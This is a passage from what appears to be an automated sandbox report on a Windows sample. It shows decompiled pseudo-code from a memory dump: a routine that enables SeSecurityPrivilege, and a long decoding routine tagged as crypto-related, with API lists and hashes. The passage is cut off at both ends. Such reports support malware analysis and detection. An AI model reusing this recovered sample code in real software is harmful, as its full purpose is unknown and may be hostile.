					 *(_t38 - 0x20) = 1;
					 *((intOrPtr*)(_t38 - 0x14)) = 2;
					_t23 = LookupPrivilegeValueW(0, L"SeSecurityPrivilege", _t38 - 0x1c); // executed
					if(_t23 != 0) {
						_t25 = AdjustTokenPrivileges( *(_t38 - 0x10), 0, _t38 - 0x20, 0, 0, 0); // executed
						if(_t25 != 0) {
							_t26 = GetLastError();
							asm("sbb bl, bl");
							_t28 =  ~_t26 + 1;
						}
					}
				}
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				E003C2A00(_t38 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t28;
			}









                                                                                                    0x003c2967
                                                                                                    0x003c2970
                                                                                                    0x003c2973
                                                                                                    0x003c2976
                                                                                                    0x003c2979
                                                                                                    0x003c2984
                                                                                                    0x003c2998
                                                                                                    0x003c299d
                                                                                                    0x003c29ab
                                                                                                    0x003c29b2
                                                                                                    0x003c29ba
                                                                                                    0x003c29c7
                                                                                                    0x003c29cf
                                                                                                    0x003c29d1
                                                                                                    0x003c29db
                                                                                                    0x003c29dd
                                                                                                    0x003c29dd
                                                                                                    0x003c29cf
                                                                                                    0x003c29ba
                                                                                                    0x003c29df
                                                                                                    0x003c29e6
                                                                                                    0x003c29f2
                                                                                                    0x003c29fa

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C2967
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,777989A0), ref: 003C2979
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,777989A0), ref: 003C2990
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 003C29B2
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,777989A0), ref: 003C29C7
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,777989A0), ref: 003C29D1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                                                                                                    • String ID: SeSecurityPrivilege
                                                                                                    • API String ID: 3475889169-2333288578
                                                                                                    • Opcode ID: 6f183e2299e3e8451cccedccddd4f58a88f05ed53b7dafefc4e6eb18402f6b90
                                                                                                    • Instruction ID: fc714e5e394c0c02ace0393f0a4b4556cabfca50f11f3ca1fcb81325d4cbba45
                                                                                                    • Opcode Fuzzy Hash: 6f183e2299e3e8451cccedccddd4f58a88f05ed53b7dafefc4e6eb18402f6b90
                                                                                                    • Instruction Fuzzy Hash: 8E111EB1A01119AFDB21DFA5DC85EEFB7BCFB04344F40452AE812E2190DB748E49DB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F3F02 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 69%
                                                                                                    			E003F3F02(signed char* __ecx, void* __eflags) {
				void* __edi;
				signed char _t523;
				intOrPtr _t524;
				signed char* _t525;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t531;
				signed char _t532;
				signed char _t535;
				signed int _t546;
				signed char _t547;
				signed char _t548;
				signed int _t550;
				signed char _t554;
				signed char _t556;
				signed char _t559;
				signed char _t561;
				void* _t562;
				signed char _t568;
				signed char _t569;
				signed char _t570;
				signed char _t575;
				signed char _t577;
				signed int _t581;
				signed char _t582;
				signed char _t588;
				signed char _t590;
				signed char _t594;
				signed char _t596;
				signed char _t597;
				signed char _t604;
				signed char _t610;
				signed char _t615;
				signed char* _t619;
				signed char _t627;
				signed char _t629;
				void* _t633;
				signed int _t636;
				intOrPtr* _t642;
				signed int _t643;
				signed char _t644;
				signed int _t646;
				signed char _t647;
				signed char _t659;
				char _t667;
				signed char _t675;
				signed char _t680;
				intOrPtr _t683;
				signed char _t685;
				void* _t688;
				signed char _t698;
				signed char _t699;
				signed char _t703;
				signed char _t705;
				signed char _t707;
				intOrPtr _t708;
				signed char _t711;
				intOrPtr _t727;
				signed char* _t728;
				signed char* _t732;
				signed int _t738;
				signed char _t761;
				signed char _t784;
				signed char _t787;
				signed int _t796;
				signed char _t800;
				intOrPtr* _t801;
				signed char _t807;
				signed char _t811;
				signed int _t815;
				signed char _t829;
				signed char _t849;
				signed int _t852;
				signed int _t853;
				intOrPtr* _t858;
				void* _t870;
				signed int _t873;
				signed char _t875;
				signed char _t876;
				signed char _t877;
				signed char _t878;
				signed char _t879;
				signed char _t881;
				intOrPtr _t882;
				signed int _t884;
				signed char _t885;
				signed char* _t887;
				signed char* _t888;
				signed int _t889;
				signed char _t890;
				signed char _t891;
				intOrPtr _t893;
				signed char _t894;
				signed char _t895;
				signed int _t898;
				intOrPtr* _t899;
				intOrPtr _t900;
				signed char _t901;
				intOrPtr _t902;
				void* _t903;

				E0041F1B0(E0042728E, _t903);
				 *(_t903 - 0x14) = __ecx;
				_t884 =  *(_t903 + 0x18);
				 *( *(_t903 + 0x2c)) =  *( *(_t903 + 0x2c)) & 0x00000000;
				_t873 = _t884 << 2;
				_t705 =  *((intOrPtr*)( *(_t903 + 0x14) + 8)) +  *(_t873 +  *((intOrPtr*)( *(_t903 + 0x14) + 0x30))) * 8;
				 *(_t903 - 0x2c) = _t705;
				E003F4C2E(_t903 - 0x5c);
				 *(_t903 - 4) =  *(_t903 - 4) & 0x00000000;
				E003FB5D2( *(_t903 + 0x14), _t884, _t903 - 0x5c);
				 *(_t903 - 0x44) =  *( *((intOrPtr*)( *(_t903 + 0x14) + 0x34)) + _t884) & 0x000000ff;
				if( *(_t903 - 0x58) <= 0x20) {
					E003ED439(_t903 - 0xc8);
					 *(_t903 - 4) = 1;
					E003FD423(_t903 - 0x88);
					 *(_t903 - 4) = 2;
					E003F4C7C(_t903 - 0x5c, _t903 - 0xc8, __eflags);
					_t519 = E003ED07D(_t903 - 0xc8, __eflags);
					__eflags = _t519;
					if(_t519 == 0) {
						L133:
						_t885 = 0x80004001;
						L199:
						_t499 = _t903 - 4;
						 *_t499 =  *(_t903 - 4) & 0x00000000;
						__eflags =  *_t499;
						E003B1E40(_t519,  *((intOrPtr*)(_t903 - 0x88)));
						E003ED46A(_t903 - 0xc8);
						goto L200;
					}
					_t849 =  *(_t903 + 0x14);
					 *(_t903 + 0x1b) = 1;
					_t524 =  *((intOrPtr*)(_t849 + 0x28));
					_t852 = ( *( *((intOrPtr*)(_t849 + 0x34)) + _t884) & 0x000000ff) +  *((intOrPtr*)(_t873 +  *((intOrPtr*)(_t849 + 0x2c))));
					__eflags =  *(_t903 + 0x1c);
					_t727 =  *((intOrPtr*)(_t524 + _t852 * 8));
					_t519 =  *(_t524 + 4 + _t852 * 8);
					if( *(_t903 + 0x1c) == 0) {
						L13:
						_t525 =  *(_t903 - 0x14);
						__eflags =  *_t525;
						if( *_t525 == 0) {
							L15:
							_t728 =  *(_t903 - 0x14);
							 *_t728 =  *_t728 & 0x00000000;
							_t526 = _t728[0x5c];
							_t887 =  &(_t728[0x5c]);
							__eflags = _t526;
							if(_t526 != 0) {
								 *((intOrPtr*)( *_t526 + 8))(_t526);
								 *_t887 =  *_t887 & 0x00000000;
								__eflags =  *_t887;
								_t728 =  *(_t903 - 0x14);
							}
							__eflags = _t728[1];
							_push(0x84);
							if(_t728[1] == 0) {
								_t527 = E003B1E0C();
								 *(_t903 - 0x64) = _t527;
								__eflags = _t527;
								 *(_t903 - 4) = 4;
								if(__eflags == 0) {
									_t528 = 0;
									__eflags = 0;
								} else {
									_t528 = E003ED368(_t527, __eflags, 0);
								}
								 *(_t903 - 4) = 2;
								( *(_t903 - 0x14))[0x50] = _t528;
								L00403CED(_t887, _t528);
								_t531 = ( *(_t903 - 0x14))[0x50];
							} else {
								_t698 = E003B1E0C();
								 *(_t903 - 0x64) = _t698;
								__eflags = _t698;
								 *(_t903 - 4) = 3;
								if(__eflags == 0) {
									_t699 = 0;
									__eflags = 0;
								} else {
									_t699 = E003F4B3C(_t698, __eflags, 0);
								}
								 *(_t903 - 4) = 2;
								( *(_t903 - 0x14))[0x54] = _t699;
								L00403CED(_t887, _t699);
								_t531 = ( *(_t903 - 0x14))[0x54];
							}
							__eflags = _t531;
							if(_t531 == 0) {
								_t532 = 0;
								__eflags = 0;
							} else {
								_t532 = _t531 + 4;
							}
							_t732 =  *(_t903 - 0x14);
							_t853 = _t903 - 0xc8;
							_t732[0x58] = _t532;
							_t535 =  *((intOrPtr*)( *(_t732[0x58]) + 4))(_t853);
							__eflags = _t535;
							if(_t535 == 0) {
								 *(_t903 - 0x1c) =  *(_t903 - 0x1c) & 0x00000000;
								__eflags =  *(_t903 - 0x58);
								if(__eflags <= 0) {
									L43:
									_t888 =  &(( *(_t903 - 0x14))[4]);
									E003ED499(_t888, __eflags, _t903 - 0xc8);
									_t109 =  &(_t888[0x40]); // 0x42
									E003BF3B6(_t109, _t903 - 0x88);
									 *( *(_t903 - 0x14)) = 1;
									L44:
									_t519 =  *((intOrPtr*)( *(( *(_t903 - 0x14))[0x58]) + 0x14))();
									_t889 = 0;
									__eflags = _t519;
									if(_t519 != 0) {
										goto L30;
									}
									 *(_t903 - 0x15) =  *(_t903 - 0x15) & 0x00000000;
									__eflags =  *(_t903 - 0x58);
									 *((intOrPtr*)(_t903 - 0x40)) = 0;
									 *((intOrPtr*)(_t903 - 0x28)) = 0;
									_t546 =  *(_t873 +  *((intOrPtr*)( *(_t903 + 0x14) + 0x2c)));
									 *(_t903 - 0x7c) = _t546;
									if( *(_t903 - 0x58) <= 0) {
										L122:
										__eflags =  *(_t903 + 0x20) - _t889;
										if( *(_t903 + 0x20) != _t889) {
											__eflags =  *(_t903 + 0x1b);
											_t320 =  *(_t903 + 0x1b) == 0;
											__eflags = _t320;
											 *((intOrPtr*)( *(( *(_t903 - 0x14))[0x58]) + 0x10))(_t853 & 0xffffff00 | _t320);
										}
										 *(_t903 - 0x78) = _t889;
										 *(_t903 - 0x74) = _t889;
										 *(_t903 - 0x70) = _t889;
										_push(0x30);
										 *(_t903 - 4) = 0x18;
										_t547 = E003B1E0C();
										 *(_t903 + 0x40) = _t547;
										__eflags = _t547 - _t889;
										 *(_t903 - 4) = 0x19;
										if(_t547 == _t889) {
											_t548 = 0;
											__eflags = 0;
										} else {
											_t548 = E003F4EDE(_t547);
										}
										__eflags = _t548 - _t889;
										 *(_t903 + 0x14) = _t548;
										 *(_t903 - 4) = 0x18;
										 *(_t903 + 0x34) = _t548;
										if(_t548 != _t889) {
											 *((intOrPtr*)( *_t548 + 4))(_t548);
										}
										__eflags =  *(_t903 - 0x48) - 1;
										_t890 =  *(_t903 + 8);
										 *(_t903 - 4) = 0x1a;
										_t707 = ( *(_t903 - 0x14))[1];
										 *((char*)(_t903 + 0x43)) = _t707;
										if( *(_t903 - 0x48) <= 1) {
											L149:
											 *(_t903 + 0x44) =  *(_t903 + 0x44) & 0x00000000;
											__eflags =  *(_t903 - 0x48);
											if( *(_t903 - 0x48) <= 0) {
												L170:
												_t550 =  *(_t903 - 0x74);
												_t891 = 0;
												__eflags = _t550;
												_t875 = _t550;
												 *(_t903 + 0x1c) = 0;
												if(_t550 != 0) {
													__eflags = _t550 - 0x3fffffff;
													if(_t550 > 0x3fffffff) {
														_t550 = 0x3fffffff;
													}
													_t575 = _t550 << 2;
													__eflags = _t575;
													_push(_t575);
													_t891 = E003B1E0C();
													 *(_t903 + 0x1c) = _t891;
												}
												_t738 = 0;
												 *(_t903 - 4) = 0x1c;
												__eflags = _t875;
												if(_t875 <= 0) {
													L176:
													_t876 =  *(_t903 + 0x20);
													__eflags = _t876;
													if(_t876 == 0) {
														_push( *((intOrPtr*)(_t903 + 0x28)));
														_push(_t891);
														_t877 = E003EE45D(( *(_t903 - 0x14))[0x50]);
														E003B1E40(_t552, _t891);
														goto L195;
													}
													 *(_t903 + 0x40) =  *(_t903 + 0x40) & 0x00000000;
													__eflags =  *(_t903 + 0x24);
													 *(_t903 - 4) = 0x1d;
													if( *(_t903 + 0x24) != 0) {
														_push( *((intOrPtr*)(( *(_t903 - 0x14))[0x58] + 0x60)));
														_t568 = E003ED276(( *(_t903 - 0x14))[0x58]);
														__eflags = _t568;
														if(_t568 == 0) {
															_push(0xc);
															_t569 = E003B1E0C();
															 *(_t903 + 0x20) = _t569;
															__eflags = _t569;
															 *(_t903 - 4) = 0x1e;
															if(_t569 == 0) {
																_t570 = 0;
																__eflags = 0;
															} else {
																_t570 = E003F4C44(_t569,  *(_t903 + 0x24));
															}
															 *(_t903 - 4) = 0x1d;
															L00403CED(_t903 + 0x40, _t570);
														}
													}
													_t556 =  *(_t903 + 0x40);
													 *(_t903 + 8) = _t876;
													__eflags = _t556;
													if(_t556 == 0) {
														_t556 =  *(_t903 + 0x24);
													}
													_t878 =  *((intOrPtr*)( *(( *(_t903 - 0x14))[0x58]) + 0x1c))(_t891, _t903 + 8, _t556,  *(_t903 + 0x2c));
													_t559 =  *(_t903 + 0x40);
													__eflags = _t559;
													 *(_t903 - 4) = 0x1c;
													if(_t559 != 0) {
														_t559 =  *((intOrPtr*)( *_t559 + 8))(_t559);
													}
													E003B1E40(_t559, _t891);
													_t561 =  *(_t903 + 0x14);
													__eflags = _t561;
													 *(_t903 - 4) = 0x18;
													if(_t561 != 0) {
														 *((intOrPtr*)( *_t561 + 8))(_t561);
													}
													 *(_t903 - 4) = 2;
													_t562 = E003EEF1D(_t903 - 0x78, _t878);
													 *(_t903 - 4) =  *(_t903 - 4) & 0x00000000;
													E003B1E40(_t562,  *((intOrPtr*)(_t903 - 0x88)));
													E003ED46A(_t903 - 0xc8);
													 *(_t903 - 4) =  *(_t903 - 4) | 0xffffffff;
													E003F4F71(_t903 - 0x5c);
													_t523 = _t878;
													goto L201;
												} else {
													do {
														 *((intOrPtr*)(_t891 + _t738 * 4)) =  *((intOrPtr*)( *((intOrPtr*)( *(_t903 - 0x78) + _t738 * 4))));
														_t738 = _t738 + 1;
														__eflags = _t738 - _t875;
													} while (_t738 < _t875);
													goto L176;
												}
											}
											_t877 =  *(_t903 - 0x2c);
											do {
												 *(_t903 + 0x1c) =  *(_t903 + 0x1c) & 0x00000000;
												_t708 =  *((intOrPtr*)(_t877 + 4));
												_t893 =  *_t877 +  *((intOrPtr*)(_t903 + 0xc));
												 *(_t903 - 4) = 0x1b;
												asm("adc ebx, [ebp+0x10]");
												__eflags =  *(_t903 - 0x48) - 1;
												if( *(_t903 - 0x48) != 1) {
													__eflags =  *((char*)(_t903 + 0x43));
													_push(0x20);
													if( *((char*)(_t903 + 0x43)) == 0) {
														_t577 = E003B1E0C();
														__eflags = _t577;
														if(_t577 == 0) {
															_t407 = _t903 + 0x18;
															 *_t407 =  *(_t903 + 0x18) & 0x00000000;
															__eflags =  *_t407;
														} else {
															 *(_t577 + 4) =  *(_t577 + 4) & 0x00000000;
															 *(_t577 + 0x18) =  *(_t577 + 0x18) & 0x00000000;
															 *_t577 = 0x42ea68;
															 *(_t903 + 0x18) = _t577;
														}
														L00403CED(_t903 + 0x1c,  *(_t903 + 0x18));
														_t413 =  *(_t903 + 0x18) + 0x18; // 0x18
														L00403CED(_t413,  *(_t903 + 0x14));
														_t761 =  *(_t903 + 0x14);
														_t581 =  *(_t903 + 0x18);
													} else {
														_t590 = E003B1E0C();
														__eflags = _t590;
														if(_t590 == 0) {
															_t393 = _t903 + 0x18;
															 *_t393 =  *(_t903 + 0x18) & 0x00000000;
															__eflags =  *_t393;
														} else {
															 *(_t590 + 4) =  *(_t590 + 4) & 0x00000000;
															 *(_t590 + 0x18) =  *(_t590 + 0x18) & 0x00000000;
															 *_t590 = 0x42ea78;
															 *(_t903 + 0x18) = _t590;
														}
														L00403CED(_t903 + 0x1c,  *(_t903 + 0x18));
														_t399 =  *(_t903 + 0x18) + 0x18; // 0x18
														L00403CED(_t399,  *(_t903 + 0x14));
														_t761 =  *(_t903 + 0x14);
														_t581 =  *(_t903 + 0x18);
													}
													 *(_t581 + 8) = _t761;
													 *((intOrPtr*)(_t581 + 0x10)) = _t893;
													 *((intOrPtr*)(_t581 + 0x14)) = _t708;
													goto L164;
												}
												_t594 =  *(_t903 + 8);
												_t885 =  *((intOrPtr*)( *_t594 + 0x10))(_t594, _t893, _t708, 0, 0);
												__eflags = _t885;
												if(_t885 != 0) {
													_t596 =  *(_t903 + 0x1c);
													 *(_t903 - 4) = 0x1a;
													__eflags = _t596;
													if(_t596 != 0) {
														 *((intOrPtr*)( *_t596 + 8))(_t596);
													}
													_t597 =  *(_t903 + 0x14);
													 *(_t903 - 4) = 0x18;
													__eflags = _t597;
													if(_t597 != 0) {
														 *((intOrPtr*)( *_t597 + 8))(_t597);
													}
													goto L198;
												}
												L00403CED(_t903 + 0x1c,  *(_t903 + 8));
												L164:
												_push(0x28);
												_t582 = E003B1E0C();
												__eflags = _t582;
												if(__eflags == 0) {
													_t894 = 0;
													__eflags = 0;
												} else {
													 *((intOrPtr*)(_t582 + 4)) = 0;
													 *((intOrPtr*)(_t582 + 8)) = 0;
													 *_t582 = 0x42b1f0;
													_t894 = _t582;
												}
												L00403CED(E003EEEF2(_t903 - 0x78, __eflags), _t894);
												_t423 = _t894 + 8; // 0x8
												L00403CED(_t423,  *(_t903 + 0x1c));
												 *(_t903 - 4) = 0x1a;
												asm("sbb ecx, [edi+0x4]");
												 *(_t894 + 0x20) =  *(_t894 + 0x20) & 0x00000000;
												 *((intOrPtr*)(_t894 + 0x10)) =  *(_t877 + 8) -  *_t877;
												 *((intOrPtr*)(_t894 + 0x18)) = 0;
												 *((intOrPtr*)(_t894 + 0x14)) =  *((intOrPtr*)(_t877 + 0xc));
												 *((intOrPtr*)(_t894 + 0x1c)) = 0;
												_t588 =  *(_t903 + 0x1c);
												__eflags = _t588;
												if(_t588 != 0) {
													 *((intOrPtr*)( *_t588 + 8))(_t588);
												}
												 *(_t903 + 0x44) =  *(_t903 + 0x44) + 1;
												_t877 = _t877 + 8;
												__eflags =  *(_t903 + 0x44) -  *(_t903 - 0x48);
											} while ( *(_t903 + 0x44) <  *(_t903 - 0x48));
											goto L170;
										} else {
											_t604 =  *(_t903 - 0x2c);
											asm("adc eax, [ebp+0x10]");
											_t877 =  *((intOrPtr*)( *_t890 + 0x10))(_t890,  *_t604 +  *((intOrPtr*)(_t903 + 0xc)),  *((intOrPtr*)(_t604 + 4)), 0,  *(_t903 + 0x14) + 0x10);
											__eflags = _t877;
											if(_t877 != 0) {
												L195:
												_t554 =  *(_t903 + 0x14);
												 *(_t903 - 4) = 0x18;
												__eflags = _t554;
												if(_t554 != 0) {
													 *((intOrPtr*)( *_t554 + 8))(_t554);
												}
												_t885 = _t877;
												L198:
												 *(_t903 - 4) = 2;
												_t519 = E003EEF1D(_t903 - 0x78, _t877);
												goto L199;
											}
											L00403CED( *(_t903 + 0x14) + 8, _t890);
											__eflags = _t707;
											if(_t707 == 0) {
												_t610 = E003ED2B6(( *(_t903 - 0x14))[0x58],  *((intOrPtr*)(( *(_t903 - 0x14))[0x58] + 0x60)));
												__eflags = _t610;
												if(_t610 != 0) {
													 *((char*)(_t903 + 0x43)) = 1;
												}
											}
											goto L149;
										}
									}
									_t615 = _t546 << 3;
									__eflags = _t615;
									 *((intOrPtr*)(_t903 - 0x68)) = 0;
									 *(_t903 - 0x60) = _t615;
									do {
										 *(_t903 - 0x1c) =  *((intOrPtr*)(_t903 - 0x68)) +  *((intOrPtr*)(_t903 - 0x5c));
										_t619 =  *((intOrPtr*)( *(( *(_t903 - 0x14))[0x58]) + 0xc))( *((intOrPtr*)(_t903 - 0x28)));
										_t784 =  *_t619;
										__eflags = _t784;
										_t879 = _t784;
										if(_t784 == 0) {
											_t879 = _t619[4];
										}
										__eflags =  *(_t903 - 0x15);
										 *(_t903 - 0x24) = _t879;
										if( *(_t903 - 0x15) != 0) {
											L61:
											 *(_t903 - 0x10) =  *(_t903 - 0x10) & 0x00000000;
											 *(_t903 - 4) = 0xc;
											 *((intOrPtr*)( *_t879))(_t879, 0x42d210, _t903 - 0x10);
											_t519 =  *( *(_t903 - 0x1c) + 0xc);
											__eflags = _t519 - _t519;
											if(_t519 != _t519) {
												_t519 =  *(_t903 - 0x10);
												 *(_t903 - 4) = 2;
												L131:
												__eflags = _t519;
												if(_t519 != 0) {
													_t519 =  *((intOrPtr*)( *_t519 + 8))(_t519);
												}
												goto L133;
											}
											_t787 =  *(_t903 - 0x10);
											__eflags = _t787;
											if(_t787 == 0) {
												__eflags = _t519;
												if(_t519 != 0) {
													goto L133;
												}
												L72:
												__eflags = _t787;
												 *(_t903 - 4) = 2;
												if(_t787 != 0) {
													 *((intOrPtr*)( *_t787 + 8))(_t787);
												}
												 *(_t903 - 0x10) =  *(_t903 - 0x10) & 0x00000000;
												 *(_t903 - 4) = 0xd;
												 *((intOrPtr*)( *_t879))(_t879, 0x42d350, _t903 - 0x10);
												_t519 =  *(_t903 - 0x10);
												__eflags = _t519;
												if(_t519 == 0) {
													L83:
													__eflags = _t519;
													 *(_t903 - 4) = 2;
													if(_t519 != 0) {
														 *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													 *(_t903 - 0x6c) =  *(_t903 - 0x6c) & 0x00000000;
													 *(_t903 - 0x10) =  *(_t903 - 0x10) & 0x00000000;
													 *(_t903 - 4) = 0x15;
													 *((intOrPtr*)( *_t879))(_t879, 0x42d250, _t903 - 0x10);
													_t627 =  *(_t903 - 0x10);
													__eflags = _t627;
													if(_t627 == 0) {
														L88:
														__eflags = _t627;
														 *(_t903 - 4) = 2;
														if(_t627 != 0) {
															 *((intOrPtr*)( *_t627 + 8))(_t627);
														}
														 *(_t903 - 0x1c) = 0;
														_t895 =  *( *(_t903 - 0x1c) + 0x10);
														__eflags = _t895;
														 *(_t903 - 0x64) = _t895;
														if(_t895 != 0) {
															_t646 = 0x1fffffff;
															__eflags = _t895 - 0x1fffffff;
															if(_t895 <= 0x1fffffff) {
																_t646 = _t895;
															}
															_t647 = _t646 << 3;
															__eflags = _t647;
															_push(_t647);
															 *(_t903 - 0x1c) = E003B1E0C();
														}
														__eflags = _t895;
														 *(_t903 - 4) = 0x16;
														 *(_t903 - 0x10) = 0;
														if(_t895 != 0) {
															_t643 = 0x3fffffff;
															__eflags = _t895 - 0x3fffffff;
															if(_t895 <= 0x3fffffff) {
																_t643 = _t895;
															}
															_t644 = _t643 << 2;
															__eflags = _t644;
															_push(_t644);
															 *(_t903 - 0x10) = E003B1E0C();
														}
														__eflags = _t895;
														 *(_t903 - 4) = 0x17;
														 *(_t903 - 0x24) = 0;
														if(_t895 <= 0) {
															L117:
															_t629 =  *(_t903 + 0x1c);
															__eflags = _t629;
															if(_t629 == 0) {
																L119:
																_t629 =  *((intOrPtr*)( *(_t903 + 0x14) + 0x28)) +  *(_t903 - 0x60);
																__eflags = _t629;
																goto L120;
															}
															__eflags =  *((intOrPtr*)(_t903 - 0x28)) -  *((intOrPtr*)(_t903 - 0xa4));
															if( *((intOrPtr*)(_t903 - 0x28)) ==  *((intOrPtr*)(_t903 - 0xa4))) {
																goto L120;
															}
															goto L119;
														} else {
															_t881 =  *(_t903 - 0x10);
															_t898 =  *(_t903 - 0x1c);
															do {
																_t858 =  *((intOrPtr*)(_t903 - 0x54));
																_t796 = 0;
																__eflags =  *(_t903 - 0x50);
																if( *(_t903 - 0x50) <= 0) {
																	L105:
																	_t796 = _t796 | 0xffffffff;
																	__eflags = _t796;
																	L106:
																	__eflags = _t796;
																	if(_t796 < 0) {
																		_t636 = 0;
																		__eflags =  *(_t903 - 0x48);
																		if( *(_t903 - 0x48) <= 0) {
																			L113:
																			_t636 = _t636 | 0xffffffff;
																			__eflags = _t636;
																			L114:
																			__eflags = _t636;
																			if(_t636 < 0) {
																				_t519 = E003B1E40(E003B1E40(_t636,  *(_t903 - 0x10)),  *(_t903 - 0x1c));
																				goto L133;
																			}
																			_t800 =  *((intOrPtr*)(_t705 + 8 + _t636 * 8)) -  *((intOrPtr*)(_t705 + _t636 * 8));
																			__eflags = _t800;
																			asm("sbb edx, [ebx+eax*8+0x4]");
																			 *_t898 = _t800;
																			 *((intOrPtr*)(_t898 + 4)) =  *((intOrPtr*)(_t705 + 0xc + _t636 * 8));
																			 *_t881 = _t898;
																			goto L116;
																		}
																		_t801 =  *((intOrPtr*)(_t903 - 0x4c));
																		while(1) {
																			__eflags =  *_t801 -  *((intOrPtr*)(_t903 - 0x40));
																			if( *_t801 ==  *((intOrPtr*)(_t903 - 0x40))) {
																				goto L114;
																			}
																			_t636 = _t636 + 1;
																			_t801 = _t801 + 4;
																			__eflags = _t636 -  *(_t903 - 0x48);
																			if(_t636 <  *(_t903 - 0x48)) {
																				continue;
																			}
																			goto L113;
																		}
																		goto L114;
																	}
																	 *_t881 =  *((intOrPtr*)( *(_t903 + 0x14) + 0x28)) + ( *((intOrPtr*)(_t858 + 4 + _t796 * 8)) +  *(_t903 - 0x7c)) * 8;
																	goto L116;
																}
																_t642 = _t858;
																while(1) {
																	__eflags =  *_t642 -  *((intOrPtr*)(_t903 - 0x40));
																	if( *_t642 ==  *((intOrPtr*)(_t903 - 0x40))) {
																		break;
																	}
																	_t796 = _t796 + 1;
																	_t642 = _t642 + 8;
																	__eflags = _t796 -  *(_t903 - 0x50);
																	if(_t796 <  *(_t903 - 0x50)) {
																		continue;
																	}
																	_t705 =  *(_t903 - 0x2c);
																	goto L105;
																}
																_t705 =  *(_t903 - 0x2c);
																goto L106;
																L116:
																 *(_t903 - 0x24) =  *(_t903 - 0x24) + 1;
																_t898 = _t898 + 8;
																_t881 = _t881 + 4;
																 *((intOrPtr*)(_t903 - 0x40)) =  *((intOrPtr*)(_t903 - 0x40)) + 1;
																__eflags =  *(_t903 - 0x24) -  *(_t903 - 0x64);
															} while ( *(_t903 - 0x24) <  *(_t903 - 0x64));
															goto L117;
														}
													} else {
														_t807 =  *(_t903 + 0x1b);
														 *(_t903 - 0x6c) = _t807;
														__eflags = _t807;
														_t885 =  *((intOrPtr*)( *_t627 + 0xc))(_t627, 0 | _t807 != 0x00000000);
														__eflags = _t885;
														if(_t885 != 0) {
															_t519 =  *(_t903 - 0x10);
															 *(_t903 - 4) = 2;
															goto L138;
														}
														_t627 =  *(_t903 - 0x10);
														goto L88;
													}
												} else {
													 *( *(_t903 + 0x34)) = 1;
													_t811 =  *(_t903 + 0x30);
													__eflags = _t811;
													if(_t811 == 0) {
														 *(_t903 - 4) = 2;
														goto L131;
													}
													 *(_t903 - 0x20) =  *(_t903 - 0x20) & 0x00000000;
													 *(_t903 - 4) = 0xe;
													_t885 =  *((intOrPtr*)( *_t811 + 0xc))(_t811, _t903 - 0x20);
													__eflags = _t885;
													if(_t885 != 0) {
														 *(_t903 - 4) = 0xf;
														L136:
														E003F4ADC(_t903 - 0x20);
														__imp__#6( *(_t903 - 0x20));
														_t519 =  *(_t903 - 0x10);
														 *(_t903 - 4) = 2;
														goto L138;
													}
													_t882 =  *((intOrPtr*)(_t903 + 0x3c));
													 *((char*)( *((intOrPtr*)(_t903 + 0x38)))) = 1;
													E003F4B1A(_t882);
													__eflags =  *(_t903 - 0x20) - _t885;
													if( *(_t903 - 0x20) != _t885) {
														E003B2ECB(_t882,  *(_t903 - 0x20));
														_t885 =  *(_t882 + 4);
													}
													E003F4F95(_t903 - 0x34, _t885 + _t885);
													_t815 = 0;
													 *(_t903 - 4) = 0x10;
													__eflags = _t885;
													if(_t885 <= 0) {
														L81:
														_t659 =  *(_t903 - 0x10);
														_t885 =  *((intOrPtr*)( *_t659 + 0xc))(_t659,  *((intOrPtr*)(_t903 - 0x34)),  *((intOrPtr*)(_t903 - 0x30)));
														__eflags = _t885;
														if(_t885 != 0) {
															 *(_t903 - 4) = 0x11;
															E003B1E40(E003F4FBB(_t903 - 0x34),  *((intOrPtr*)(_t903 - 0x34)));
															 *(_t903 - 4) = 0x12;
															goto L136;
														}
														 *(_t903 - 4) = 0x13;
														E003B1E40(E003F4FBB(_t903 - 0x34),  *((intOrPtr*)(_t903 - 0x34)));
														 *(_t903 - 4) = 0x14;
														E003F4ADC(_t903 - 0x20);
														__imp__#6( *(_t903 - 0x20));
														_t519 =  *(_t903 - 0x10);
														_t879 =  *(_t903 - 0x24);
														goto L83;
													} else {
														do {
															_t667 =  *((intOrPtr*)( *(_t903 - 0x20) + _t815 * 2));
															 *((char*)( *((intOrPtr*)(_t903 - 0x34)) + _t815 * 2)) = _t667;
															 *((char*)( *((intOrPtr*)(_t903 - 0x34)) + 1 + _t815 * 2)) = _t667;
															_t815 = _t815 + 1;
															__eflags = _t815 - _t885;
														} while (_t815 < _t885);
														goto L81;
													}
												}
											}
											_t885 =  *((intOrPtr*)( *_t787 + 0xc))(_t787,  *((intOrPtr*)( *(_t903 - 0x1c) + 8)), _t519);
											__eflags = _t885 - 0x80070057;
